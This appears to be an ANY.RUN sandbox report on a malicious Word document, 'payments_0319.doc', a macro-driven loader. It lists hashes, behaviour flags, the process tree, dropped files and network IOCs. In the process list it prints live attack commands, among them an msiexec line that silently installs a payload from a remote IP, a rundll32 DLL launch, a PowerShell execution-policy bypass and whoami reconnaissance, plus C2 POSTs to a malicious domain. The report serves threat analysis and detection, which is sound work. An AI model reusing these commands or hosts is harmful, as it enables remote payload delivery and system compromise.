analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

payments_0319.doc

Full analysis: https://app.any.run/tasks/e292abaa-bde8-48d9-b6d7-a69962181ca5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 21, 2019, 16:02:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
exe-to-msi
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 1, Template: Normal.dotm, Last Saved By: 1, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Mar 21 08:24:00 2019, Last Saved Time/Date: Thu Mar 21 08:24:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0
MD5:

987FE3124FC850B96D2B8D04259F2D3E

SHA1:

5E4B96F7D469E82892267E2B96427B47233EE3D3

SHA256:

8A285EFB01FCD9A3AB41B33C828E42C53BC179ED7895F640E8B5037C4A2A6E97

SSDEEP:

1536:P/fY8qaiKOCDP9czDKaT+ej7Nhbi9AFlaim4oreBqitzIzK/kH:AHaiKOi9LInKc2x0qIzIzK/kH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 688)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 688)
    • Application was dropped or rewritten from another process

      • nsA7E2.tmp (PID: 2216)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3424)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3424)
    • Loads dropped or rewritten executable

      • rundll32.exe (PID: 2940)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2804)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3424)
      • MSIA6E8.tmp (PID: 3156)
    • Starts application with an unusual extension

      • MSIA6E8.tmp (PID: 3156)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3424)
    • Starts CMD.EXE for commands execution

      • nsA7E2.tmp (PID: 2216)
      • rundll32.exe (PID: 2940)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 1272)
    • Uses WHOAMI.EXE to obtaining logged on user information

      • cmd.exe (PID: 572)
    • Creates files in the user directory

      • powershell.exe (PID: 3316)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 688)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 688)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3424)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3424)
    • Loads dropped or rewritten executable

      • MSIA6E8.tmp (PID: 3156)
    • Application was dropped or rewritten from another process

      • MSIA6E8.tmp (PID: 3156)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: 1
Keywords: -
Template: Normal.dotm
LastModifiedBy: 1
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: 1.0 minutes
CreateDate: 2019:03:21 08:24:00
ModifyDate: 2019:03:21 08:24:00
Pages: 1
Words: 1
Characters: 9
Security: None
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 9
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Название
  • 1
CodePage: Windows Cyrillic
Created: 2018:12:18 00:00:00
LastSaved: 2018:12:18 00:00:00
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
11
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs msiexec.exe no specs msiexec.exe msia6e8.tmp nsa7e2.tmp no specs cmd.exe no specs rundll32.exe cmd.exe no specs powershell.exe no specs cmd.exe no specs whoami.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
688"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\payments_0319.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1964"C:\Windows\System32\msiexec.exe" at=c36Ik back=002 error=Continue /i http://169.239.128.104/alg /q OnExit="c:\windows\calc.exe" FW=c36Ik C:\Windows\System32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3424C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3156"C:\Windows\Installer\MSIA6E8.tmp"C:\Windows\Installer\MSIA6E8.tmp
msiexec.exe
User:
admin
Company:
hepsu burda
Integrity Level:
MEDIUM
Description:
hepsu burda Application
Version:
1.0.2.1
2216"C:\Users\admin\AppData\Local\Temp\nsdA7E1.tmp\nsA7E2.tmp" "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Users\admin\AppData\Local\Temp\nsdA7E1.tmp\nsA7E2.tmpMSIA6E8.tmp
User:
admin
Integrity Level:
MEDIUM
1272"cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Windows\system32\cmd.exensA7E2.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2940rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Windows\system32\rundll32.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2804cmd.exe /C powershell -nop -ep bypass -f %temp%\enu.ps1C:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3316powershell -nop -ep bypass -f C:\Users\admin\AppData\Local\Temp\enu.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
572cmd.exe /C whoamiC:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 775
Read events
1 031
Write events
0
Delete events
0

Modification events

No data
Executable files
6
Suspicious files
4
Text files
10
Unknown types
7

Dropped files

PID
Process
Filename
Type
688WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8AC2.tmp.cvr
MD5:
SHA256:
688WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF5BFD5176C4F56D70.TMP
MD5:
SHA256:
688WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF0E6225A5A244E463.TMP
MD5:
SHA256:
688WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF0220CF6BB191F68A.TMP
MD5:
SHA256:
3424msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFAD7859C36E39F190.TMP
MD5:
SHA256:
688WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A3D37A96BE99E1B37F142EAB31105E77
SHA256:10776DED098C89C43628A733533878C3854AA3666210F1501E5D0D74311EF8F0
688WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:49A14F7C3CCC4BF46A4AA5BB1DDE122C
SHA256:15C788965B8A23A2A256979FB28A6A7B1428E03438BD7E25A139CE3BF92A70F3
3424msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:7A64CE528BB9D9BC7D47AA94554CF8F5
SHA256:754C76B118A6BA25D67E2EAAF2C7BC72554866C52495094C1D6A896AF504BF00
3424msiexec.exeC:\Windows\Installer\MSI9F73.tmpexecutable
MD5:D4C11BDA021113CA4604D80896B2A492
SHA256:AE2B1B1F7265386EDBBF2617084F277CDB9BC5AC34BD9AAC00CBC77A6BDCD829
688WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$yments_0319.docpgc
MD5:8D458D1FEC0AEBD2ACFE0698A5F5CB41
SHA256:C9650258403ECC246A4BC745087DCCC4EAEC9CAFA4B7409D9C1D162B49F312B2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3424
msiexec.exe
GET
200
169.239.128.104:80
http://169.239.128.104/alg
ZA
executable
396 Kb
suspicious
2940
rundll32.exe
POST
200
179.43.156.37:80
http://cdnavupdate.icu/jquery/jquery.php
CH
text
12 b
malicious
2940
rundll32.exe
POST
200
179.43.156.37:80
http://cdnavupdate.icu/jquery/jquery.php
CH
text
12 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3424
msiexec.exe
169.239.128.104:80
Zappie Host LLC
ZA
suspicious
2940
rundll32.exe
179.43.156.37:80
cdnavupdate.icu
Private Layer INC
CH
suspicious

DNS requests

Domain
IP
Reputation
cdnavupdate.icu
  • 179.43.156.37
malicious

Threats

PID
Process
Class
Message
3424
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3424
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
2940
rundll32.exe
Potentially Bad Traffic
ET INFO HTTP POST Request to Suspicious *.icu domain
2940
rundll32.exe
Potentially Bad Traffic
ET INFO HTTP POST Request to Suspicious *.icu domain
1 ETPRO signatures available at the full report
No debug info